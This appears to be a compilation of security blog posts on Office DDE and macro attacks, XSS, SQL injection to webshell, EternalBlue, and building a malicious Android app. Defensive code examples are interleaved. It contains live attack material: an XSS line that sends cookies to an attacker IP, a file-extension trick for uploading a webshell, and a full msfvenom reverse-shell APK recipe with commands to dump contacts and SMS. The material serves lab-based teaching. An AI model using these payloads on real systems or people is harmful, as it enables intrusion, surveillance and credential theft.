DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one, as it’s slightly different.

If a document opens and you are greeted by a pop up of any kind, then I’d say 99 times out of a hundred, it’s going to be a malicious exploit and you should just close and delete the document immediately and run a full Anti-Virus scan with at least 3 different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment.

It’s a little different to the typical Macro exploits which are normally used.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point of this video, however, is to show that if you read what the pop-up says, you should not be clicking on it under any circumstances.

It’s true that some documents are linked dynamically to keep all data in linked sheets up to date. However if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably shouldn’t even be opening the attachment in the first place!

Then, after clicking yes to the first pop-up, we receive a second one. This is generally where the exploit will run. Ours is very obviously named for the sake of this demonstration, but an attacker would be trying their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling Macros in documents we receive via email! (Come on people!)

Anyways, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email from Jerry.random@uk-company.com, but you can clearly see it actually came from a gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set to not allow Macros to run automatically, but we are aware that a lot of people don’t use this setting (you nut-cases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure of what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to install malware or ransomware. We have used this method in our demo as it is very quick and visual, and seems to get the point across better than a more complicated example.
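Both posts above come down to the same triage question: does this Office file carry a DDE field or a VBA project? The following is an added example, not code from the posts, that answers it for OOXML files (.docx/.xlsx/.xlsm) by looking inside the zip container; the sample documents are constructed here and the DDEAUTO command in them is a placeholder, not a working field.

```python
import io
import re
import zipfile

# Field codes that make Word (and Excel via external links) start a program over DDE.
DDE_FIELD = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)
# Parts that exist only when the file contains a VBA project (macros).
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")

def triage_office_file(data):
    """Return a list of findings for an OOXML document given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for part in MACRO_PARTS:
            if part in names:
                findings.append("macro: VBA project present (" + part + ")")
        for name in sorted(names):
            if not name.endswith(".xml"):
                continue
            xml = z.read(name).decode("utf-8", "replace")
            # A field's instruction text may be split over several w:instrText
            # runs; join them first so a DDEAUTO spread across runs is still seen.
            instr = "".join(re.findall(r"<w:instrText[^>]*>(.*?)</w:instrText>", xml, re.S))
            # Excel stores DDE external links as ddeLink elements instead of fields.
            if DDE_FIELD.search(instr) or "<ddeLink" in xml:
                findings.append("dde: DDE field or link in " + name)
    return findings

def build_sample(document_xml, extra_parts=()):
    """Constructed minimal .docx-like zip for the demo (not a real Office file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        for part in extra_parts:
            z.writestr(part, b"")
    return buf.getvalue()

# Constructed samples: the DDE instruction is split over two runs and the
# command is a placeholder; the macro sample only carries an empty VBA part.
SPLIT_DDE = build_sample(
    '<w:p><w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO placeholder-program "placeholder-args"</w:instrText></w:r></w:p>')
CLEAN = build_sample("<w:p><w:r><w:t>Hello</w:t></w:r></w:p>")
MACRO = build_sample("<w:p/>", extra_parts=("word/vbaProject.bin",))
```

Real files can be checked the same way by passing the bytes read from disk to triage_office_file.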

Fake URL in Email

It’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!

XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (or another user’s) by using Cross-Site Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags, document.write('<img src="http://192.168.56.104/?'+document.cookie+'"/>'); we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel, and from there we can add malicious code, create new users or look to get root access on the server.

The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.

To demonstrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com.
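Alongside the input filtering the post recommends, the two controls that stop this exact cookie theft are output encoding and the HttpOnly cookie flag. Here is an added Python example (not code from the post or from the PentesterLab VM) that renders the post’s payload both ways and builds the hardened Set-Cookie header; the session id value is a constructed placeholder.

```python
import html

# The payload from the post above, exactly as an attacker would submit it into a text area.
STORED_PAYLOAD = (
    "<script>document.write('<img src=\"http://192.168.56.104/?'"
    "+document.cookie+'\"/>');</script>"
)

def render_comment_unsafe(text):
    # Pastes user input straight into the page, so the browser runs the script
    # and the admin's cookie is sent to the attacker's host.
    return '<div class="comment">' + text + "</div>"

def render_comment(text):
    # Output encoding: <, >, &, and both quote characters become entities, so the
    # browser displays the payload as text instead of executing it.
    return '<div class="comment">' + html.escape(text, quote=True) + "</div>"

def session_cookie_header(session_id):
    # HttpOnly keeps the cookie out of document.cookie, so even a script that
    # does run cannot read it; Secure and SameSite limit where it is sent.
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id

def contains_live_script(page_html):
    """Crude check for the demo: is there an unescaped <script tag in the output?"""
    return "<script" in page_html
```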

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking, so that when users are redirected to our site they are less suspicious, as any differences are subtle and won’t generally be noticed by normal users. Then we load the cloned pages on our webserver.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (Poisoning the host file or typo-squatting is a whole tutorial by itself).

Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points to so it sends users to our clone site rather than the correct login page.

We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first will show how, using a tool called sqlmap, we can carry out successful SQL Injection and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.

Then once we have access to the admin section, we upload our php shell, but the site has some basic filtering, so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml” which gets us past the filtering controls. It also shows why, even in password protected areas of your site, you still need robust upload controls. That way, if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.
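The chain in Part 1 has two weak points, and each has a standard fix. The following is an added Python example (not code from the post or from the demo site) showing a parameterised query for the id parameter next to the injectable version, and an allow-list upload check that rejects the double-extension rename used above. The in-memory table and the sample uploads are constructed for the demo.

```python
import sqlite3

def demo_db():
    """Constructed in-memory stand-in for the site's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, "admin"), (2, "alice"), (3, "bob")])
    return con

def lookup_injectable(con, user_id):
    # Mirrors an injectable "php?id=1" handler: the value is pasted into the SQL,
    # so "1 OR 1=1" rewrites the WHERE clause and returns every row.
    sql = "SELECT username FROM users WHERE id = " + user_id
    return [row[0] for row in con.execute(sql)]

def lookup_parameterised(con, user_id):
    # Bound parameter: the value is data, never SQL. A non-numeric string simply
    # matches no row, so there is nothing for sqlmap to work with.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in con.execute(sql, (user_id,))]

# Extensions the web server would execute, wherever they appear in the name.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "phps"}
# Allow-listed image types and the magic bytes each must start with.
IMAGE_MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
               "png": b"\x89PNG\r\n\x1a\n"}

def upload_allowed(filename, data):
    """Allow-list check for an image upload that also defeats double extensions."""
    exts = filename.lower().split(".")[1:]
    if not exts or any(e in EXECUTABLE_EXTS for e in exts):
        return False  # catches "shell.jpg.phtml" as well as "shell.phtml.jpg"
    magic = IMAGE_MAGIC.get(exts[-1])
    if magic is None:
        return False  # final extension is not on the allow-list
    return data.startswith(magic)  # the content must really be that image type
```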

How To Create a Malicious App for Android

So, I recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another Terminal Window and use the following, making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set the IP, Port and Payload. The port and IP need to be the same as those set in the previous step when using msfvenom.

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We now have everything we need configured, so we can start the “listener”.

run

Then we use social engineering to try and get someone to install and run it.

When they do, you will see the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can quickly dump info from the phone immediately using the dump commands.

dump_contacts

dump_sms

You can also capture a screenshot, take a photo from either camera, or even stream live from either camera on the device. Scary huh?

If you have NO anti-virus on your Android, and you have disabled the “verify apps” feature, then this simple app will run without any issues.

If you have an Android phone, enable the app verifier and get some anti-virus to at least give yourself a fighting chance!

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.
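Before the follow-up on making these apps harder to spot, here is the other side: an added Python triage script (not from the post or from Metasploit) that opens an APK as a zip and flags two things the post exercises, the permissions behind dump_contacts, dump_sms and the camera, and the class path under which the stock msfvenom Android payload is packaged. The class-path string is an assumption about the unchanged msfvenom template and is a heuristic, not proof; the sample APKs are constructed here and are not real apps.

```python
import io
import zipfile

# Permissions behind what the post shows the session doing: reading contacts
# and SMS, and using the camera and microphone.
SENSITIVE_PERMISSIONS = (
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
)
# Package path of the Metasploit Android payload classes (assumption: stock
# msfvenom template). One heuristic indicator among others, not proof.
PAYLOAD_MARKER = b"com/metasploit/stage"

def triage_apk(data):
    """Return heuristic findings for an APK given as bytes."""
    findings = {"permissions": [], "payload_marker": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "AndroidManifest.xml" in names:
            manifest = z.read("AndroidManifest.xml")
            for perm in SENSITIVE_PERMISSIONS:
                # The binary manifest keeps its strings in a pool, normally UTF-16LE;
                # checking both encodings avoids parsing the whole format.
                if perm.encode("utf-16-le") in manifest or perm.encode() in manifest:
                    findings["permissions"].append(perm)
        for name in names:
            if name.startswith("classes") and name.endswith(".dex"):
                if PAYLOAD_MARKER in z.read(name):
                    findings["payload_marker"] = True
    return findings

def build_sample_apk(permissions, dex_bytes):
    """Constructed stand-in APK: a zip with a fake manifest and dex, for the demo only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        pool = b"".join(p.encode("utf-16-le") + b"\x00\x00" for p in permissions)
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + pool)
        z.writestr("classes.dex", b"dex\n035\x00" + dex_bytes)
    return buf.getvalue()

SUSPICIOUS = build_sample_apk(SENSITIVE_PERMISSIONS[:2], b"Lcom/metasploit/stage/Payload;")
BENIGN = build_sample_apk(("android.permission.INTERNET",), b"Lcom/example/notes/MainActivity;")
```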

Android App Vulnerability Scanning

Recently I had the need to assess some Android Apps and had to hunt quite a bit for something decent but I found it Here. The AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications, and it’s QUICK!

I use Linux, so getting up and running is as simple as downloading from the above link, unzipping it somewhere convenient and making sure you have Python installed; for basic usage that’s it!

I have an Android app named “app.apk” and a Reports folder in the Framework-master folder.

So from within the Androbugs-framework folder we simply run

python androbugs.py -f ~/Downloads/app.apk -o Reports

That’s it! We get a really good report listing bugs, CVEs, and TLS issues, to name a few.

There is also a “Massive Analysis Tool” for Linux which looks really good but requires a bit more setup. It requires a MongoDB instance, so once I’ve got that up and running I’ll post on it.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment. ms17_010, or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important to not only keep your anti-virus solution up to date, but also to install the latest patches for your OS. This exploit requires just 2 things: that the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, set up using the Metasploitable 3 script from this project https://github.com/rapid7/metasploitable3

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines. Even if you think you can’t, set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you want to set up Metasploitable 3 you need to do a bit of legwork; it doesn’t just work out of the box like its predecessor, and you need to install some prerequisites. The guides I used are here http://www.prodefence.org/2017/06/setup-metasploitable-3-windows-10/ and here https://www.youtube.com/watch?v=i_K2cZcTXeI&t=580s
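The exploit needs port 445 open and the patch missing, and the usual hardening alongside the patch is to switch SMBv1 off. To confirm that on a host you administer, here is an added Python probe (not code from the post or from Metasploit) that sends one SMB1 negotiate offering only the NT LM 0.12 dialect and reports whether the server accepts it. The flag values follow the SMB1 wire format as I understand it, and the two reply constants are constructed for the offline test.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"

def build_smb1_negotiate():
    """SMB_COM_NEGOTIATE request offering only the NT LM 0.12 dialect."""
    dialects = b"\x02NT LM 0.12\x00"
    # 32-byte SMB1 header: magic, command 0x72, status, flags, flags2,
    # PIDHigh, signature, reserved, TID, PID, UID, MID.
    header = SMB1_MAGIC + struct.pack("<BIBH", 0x72, 0, 0x18, 0x2801)
    header += struct.pack("<H8sHHHHH", 0, b"\x00" * 8, 0, 0, 0, 0, 0)
    body = b"\x00" + struct.pack("<H", len(dialects)) + dialects  # WordCount, ByteCount
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg  # NetBIOS session header

def classify_negotiate_reply(data):
    """Map a server reply to 'smb1' (dialect accepted), 'smb2', or 'none'."""
    if len(data) < 8:
        return "none"
    magic = data[4:8]  # skip the 4-byte NetBIOS session header
    if magic == SMB1_MAGIC:
        # After the 32-byte header: WordCount, then DialectIndex; 0xFFFF means
        # the server rejected every dialect we offered.
        if len(data) >= 4 + 32 + 3:
            idx = struct.unpack_from("<H", data, 4 + 33)[0]
            return "smb1" if idx != 0xFFFF else "none"
        return "smb1"
    if magic == SMB2_MAGIC:
        return "smb2"
    return "none"

def smb1_enabled(host, port=445, timeout=3.0):
    """Connect to host and report whether it still negotiates SMBv1."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_smb1_negotiate())
            reply = s.recv(1024)
    except (OSError, socket.timeout):
        return "none"  # connection refused, reset or silent: SMB1 not offered
    return classify_negotiate_reply(reply)

# Constructed replies for offline checking: header, WordCount, DialectIndex.
ACCEPTED_REPLY = b"\x00\x00\x00\x23" + SMB1_MAGIC + b"\x72" + b"\x00" * 27 + b"\x11" + b"\x00\x00"
REJECTED_REPLY = b"\x00\x00\x00\x23" + SMB1_MAGIC + b"\x72" + b"\x00" * 27 + b"\x01" + b"\xff\xff"
```

A result of "smb1" against a lab box such as the Metasploitable 3 server above means the service is still talking the protocol the exploit needs; on a patched, SMBv1-disabled host it should come back "none".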